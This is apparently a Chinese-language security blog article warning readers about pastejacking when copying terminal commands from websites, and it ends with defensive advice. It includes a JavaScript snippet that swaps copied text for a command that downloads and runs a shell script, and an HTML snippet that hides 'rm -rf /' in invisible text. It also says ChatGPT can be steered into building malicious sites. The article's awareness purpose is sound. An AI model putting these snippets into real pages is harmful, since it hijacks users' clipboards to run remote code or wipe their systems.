😊All Things N
按主題查看 Windows macOS Linux Android iPhone 遊戲 人工智慧
😊All Things N

Contents

為什麼您不應該從 Internet 複製粘貼命令

 included in Security Cybersecurity Remote Access Hacking Malware Html Javascript Coding Tips
   83 words   One minute 

從電腦到手機,複製粘貼無處不在。它使生活變得更輕鬆並節省您的時間,因為您不必輸入長命令或多餘的文本。但是,如果您不夠小心,只需在計算機終端上複製粘貼命令就可能會遭到黑客攻擊。

我們是否應該深入探討與復制和插入文本實踐相關的潛在漏洞,並討論可用於防範此類風險的預防措施?

為什麼你不應該複製粘貼命令

無論是缺乏命令行界面經驗的用戶還是熟練的從業者,個人通過複製和粘貼從在線源獲取的命令作為加快工作流程和提高生產力的一種手段並不罕見。雖然這種方法乍一看似乎很有效,但重要的是要認識到某些惡意網站已經開始利用這種做法,在復制的文本框中嵌入有害代碼,從而在用戶無意中將命令粘貼到他們的系統中時,秘密地將惡意軟件引入到毫無戒心的用戶系統中。終端。

為了掩蓋惡意指令,這些邪惡的人在其前端實現中採用了一系列欺騙技術,將看似無害的代碼渲染為隱蔽和有害行為的幌子。

執行命令“sudo apt-get update && apt-get Upgrade”通常用於在 Linux 系統上更新存儲庫和升級包。但是,在使用“sudo”前綴時務必小心謹慎,因為它會授予管理權限,這可能會允許在用戶不知情的情況下執行惡意代碼。因此,在將任何命令輸入終端之前驗證其真實性非常重要。

在嚴重的情況下,可以想像,整個系統可能會被推翻或勒索軟件攻擊。然而,這些惡意實體到底採用了什麼策略來執行此類行動呢?通過什麼方法可以將有害指令隱藏在看似無害的代碼中?

惡意代碼如何利用

/bc/images/poc-of-exploit.jpg

這種攻擊可以利用設計複雜的 JavaScript 代碼甚至基本的 HTML 語法來執行。 JavaScript 語言配備了一種稱為“EventListener”的工具,它可以檢測和處理 Web 瀏覽器中可能發生的各種事件,包括但不限於單擊按鈕、提交表單、移動頁面等。光標、鍵入按鍵或調整視口的大小。

EventListener 是一個重要的工具,使 Web 應用程序能夠對用戶操作發起的特定事件做出適當的響應。不幸的是,眾所周知,不道德的網站通過攔截用戶複製文本的實例並隨後用有害代碼替換它來利用這種有益的功能。

創建演示圖像時使用的主要代碼如下:

 <script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

下面是一個使用純 HTML 的演示,不需要任何腳本語言(如 JavaScript):

 <p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

利用不易察覺的白色字體隱藏了惡意命令“rm-rf/”,而利用HTML換行元素( )使得某些終端能夠在粘貼時自動執行內容。與普遍的看法相反,不需要精通編程或網絡開發就可以成功實施此類網絡攻擊;相反,它實現起來非常簡單。

儘管不熟悉 JavaScript 或 Web 開發,即使是新手用戶也可能使用 ChatGPT 來開發有害代碼。通過提供戰略輸入,不道德的個人可以利用系統中的漏洞,有效地損害其安全措施,並引導系統利用這些弱點生成惡意網站。

如何保護自己

/bc/images/blue-purple-coding.jpg

雖然沒有萬無一失的方法來保護自己免受惡意代碼攻擊,但人們可以採取某些預防措施,例如禁止在被認為具有潛在危害的網站上執行 JavaScript。然而,值得注意的是,許多現代 Web 應用程序需要 JavaScript 才能正常運行,因此完全禁用它可能會妨礙瀏覽功能。

此外,級聯樣式表方法在使用合法 CSS 代碼時防範惡意腳本方面提出了挑戰,儘管其意圖仍然有害。為了有效地保護自己,遵守基本的在線衛生習慣和保持警惕至關重要。

使用命令行時,建議在瀏覽不熟悉或可疑的鏈接時小心謹慎。為了減輕潛在的安全風險,建議用戶在終端環境中執行命令之前,先在文本編輯應用程序中進行檢查,以驗證從外部源獲取的任何命令的真實性。通過堅持使用值得信賴且完善的代碼存儲庫,個人可以最大程度地減少通過毫無戒心的方式將有害代碼引入其係統的可能性。

此外,某些終端仿真器(例如 xfce4-terminal)配備了內置安全措施,以防止未經授權的複制和粘貼命令。此功能會顯示一條通知,概述在終端中粘貼命令時將執行的特定操作。為確保您的終端也具備此功能,請驗證其可用性並相應地啟用它。

惡意代碼執行非常危險

即使安裝了防病毒程序,某些類型的有害軟件仍可能設法破壞設備的安全防禦。因此,從互聯網下載或複制任何代碼時必須小心謹慎,並採取必要的預防措施來防範潛在威脅。

Updated on 2023-08-30
Back | Home